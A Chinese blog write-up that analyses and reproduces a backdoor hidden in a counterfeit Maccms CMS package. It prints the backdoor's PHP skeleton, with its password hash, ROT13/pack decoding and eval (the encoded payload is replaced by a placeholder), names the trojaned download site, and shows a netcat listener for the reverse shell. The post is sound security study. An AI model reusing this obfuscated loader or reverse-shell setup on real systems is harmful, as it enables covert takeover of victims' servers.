该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!!

Maccms官网:http://www.maccms.cn/

Maccms网站基于PHP+MYSQL的系统,易用性、功能良好等优点,用途范围广。

(下载的此文件带有后门,网站也跟官网的一样。。。)Maccms下载地址:http://www.maccmsv10.com/

1、下载好了之后,解压出来,后门文件存在于

后门文件:extend/Qcloud/Sms/Sms.php

后门文件:extend/upyun/src/Upyun/Api/Format.php

注:(这两个都是后门文件,此文章用Format.php作为演练过程)

2、我们把后门文件Format.php复制到phpstudy的www目录下,然后打开读取代码。

(在读取代码的时候能看到一大串编译过的恶意代码)

源码如下,我把编译过的恶意代码改为了文字

<?php

error_reporting(E_ERROR);                //报错

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');                         //初始环境

header("content-Type: text/html; charset=utf-8");              //编译编码方式

$password = "0d41c75e2ab34a3740834cdd7e066d90";             //WorldFilledWithLove(密码使用的是md5编码)

function s(){

$str = "编码之后的恶意代码";

$str = str_rot13($str);             //对恶意代码进行ROT13编码

m($str);

}

function m($str){

global $password;

$jj = '';

eval($jj.pack('H*',$str).$jj);

//pack('H*',$str)  对混淆的PHP代码进行解码,解码之后的代码经过eval函数的解析

}

s();

?>

注(如果想看编译之后的恶意代码源码我们只需要在新建一个php,然后复制一下代码就好

$str = "编码之后的恶意代码";

echo pack('H*',$str);                  )

3、在网站中打开此php文件出现如下页面,密码也就是上面源码中密码MD5翻译过来的密码

此时我们进来了后门页面,如果我们下载了此文件,然后打开了,那么攻击者同样可以在后门中操控靶机的电脑=。=

下面以反弹shell为例进行操控

1、设置反弹配置

1、打开虚拟机kali(如我们设置的反弹端口是7777)

kali开启监听端口:nc -lvvp 7777  (开始监听端口7777)

反弹shell(将肉鸡/目标机上的终端或者解析器或shell弹到攻击者的电脑中,注意需要攻击者提前监听,使用NC监听:nc -lvvp 7777,  -l表示本地,vv表示详细信息,-p表示端口)

此时进入到了靶机的www目录下,说明反弹成功=。=

Maccms后门分析复现(并非官网的Maccms){10.15 第二十二天}的更多相关文章

  1. 黑龙江网络安全技能竞赛awd后门分析复现

    0x0环境 0x1分析复现 0x2感想 围绕主办方留下的浅显后门可以打满整场,想拿第一还是要搞定深层后门

  2. Maccms 后门分析

    (该文参考网络他人资料,仅为学习,不许用于非法用途) 一.环境 攻击者  : Kali Linux 被攻击者 :Windows Maccms 网站基于php+mysql 的系统,易用性.功能良好等优点 ...

  3. sudo 提权漏洞(CVE-2019-14287)复现 (10.16 第二十二天)

    sudo是Linux系统命令,让普通账号以root身份去执行某些命令,比,安装软件.查看某些配置文件.关机.重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo ...

  4. 如何运行Struts2官网最新Demo?

    本篇将讲述下如何运行官网当前最新Struts2.5.10.1 版本的Demo. Struts2 官网:http://struts.apache.org/ 0x00 Demo下载 Struts2 官网2 ...

  5. 对石家庄铁道大学官网UI设计的分析

    在这一周周一,老师给我们讲了PM,通过对PM的学习,我知道了PM 对项目所有功能的把握, 特别是UI.最差的UI, 体现了团队的组织架构:其次, 体现了产品的内部结构:最好, 体现了用户的自然需求.在 ...

  6. 【官网翻译】性能篇(四)为电池寿命做优化——使用Battery Historian分析电源使用情况

    前言 本文翻译自“为电池寿命做优化”系列文档中的其中一篇,用于介绍如何使用Battery Historian分析电源使用情况. 中国版官网原文地址为:https://developer.android ...

  7. 针对石家庄铁道大学官网首页的UI分析

    身为一名光荣的铁大铮铮学子,我对铁大的网站首页非常的情有独钟,下面我就石家庄铁道大学的官网首页进行UI分析: 1.在首页最醒目的地方赫然写着石家庄铁道大学七个大字,让人一眼就豁然开朗. 2.网站有EN ...

  8. MXNet官网案例分析--Train MLP on MNIST

    本文是MXNet的官网案例: Train MLP on MNIST. MXNet所有的模块如下图所示: 第一步: 准备数据 从下面程序可以看出,MXNet里面的数据是一个4维NDArray. impo ...

  9. 2019-9-28:渗透测试,phpstudy后门,利用复现

    9月20号爆出Phpstudy存在隐藏后门,简单复现下后门效果 该文章仅供学习,利用方法来自网络文章,仅供参考 目标机:win7系统,安装phpstudy 2018版,php版本5.2或php 5.4 ...

随机推荐

  1. 分页插件 layui.laypage 的用法

    参考 layui.laypage 官方文档 https://www.layui.com/demo/laypage.html 第一步下载插件 (注意不能只引入引入 layui.css和layui.js ...

  2. windows系统下 VUE cli手脚架环境安装

    1.安装 node.js环境  (cmd命令工具里输入 node -v 检测是否安装成功) 2.安装VUE 全局环境 npm install --global vue-cli (cmd命令工具里面安装 ...

  3. 「Luogu P3820 小D的地下温泉」

    这道题的考点比较多. 前置芝士 BFS(DFS),这两种算法在这道题中并没有什么特别突出的地方,基本就是自己看心情写(本文以DFS为准,所以我心情是好是坏呢?) 连通块,可以将每一个温泉看作一个连通块 ...

  4. 图解jvm--(一)jvm内存结构

    jvm内存结构 1.程序计数器 1.1 定义 Program Counter Register 程序计数器(寄存器) 作用,记住下一条jvm指令的执行地址 特点 是线程私有的 (唯一)不会存在内存溢出 ...

  5. 本地模拟内存溢出并分析Dump文件

    java Dump文件分析 前言 dump文件是java虚拟机内存在某一时间点的快照文件,一般是.hprof文件,下面自己模拟一下本地内存溢出,生成dump文件,然后通过mat工具分析的过程. 配置虚 ...

  6. 使用Go语言一段时间的感受

    作者 openkk 2012-03-04 18:26:58 文/Windstorm 有一段时间没更新了.最近在忙一个 Server+Client 的项目,Client 是 Android 手机,大概也 ...

  7. JavaBean是什么

    作者:杨博链接:https://www.zhihu.com/question/19773379/answer/31625054来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出 ...

  8. upload-labs-env文件上传漏洞 1-10关

    Pass-01 首先先看源码: function checkFile() { ].value; if (file == null || file == "") { alert(&q ...

  9. NCSC敦促开发者淘汰Python 2

    导读 Python 2.x即将结束生命,英国国家网络安全中心(NCSC)敦促开发人员尽快从Python 2.x迁移到Python 3.x.越快越好.Python 2.x将于2020年1月1日停止使用, ...

  10. Web项目设置编码格式

    1. 如果用的Tomcat ,请修改server.xml 中Connector URIEncoding="UTF-8" (GET请求时) 2. 用字符编码过滤器,设置默认编码方式为 ...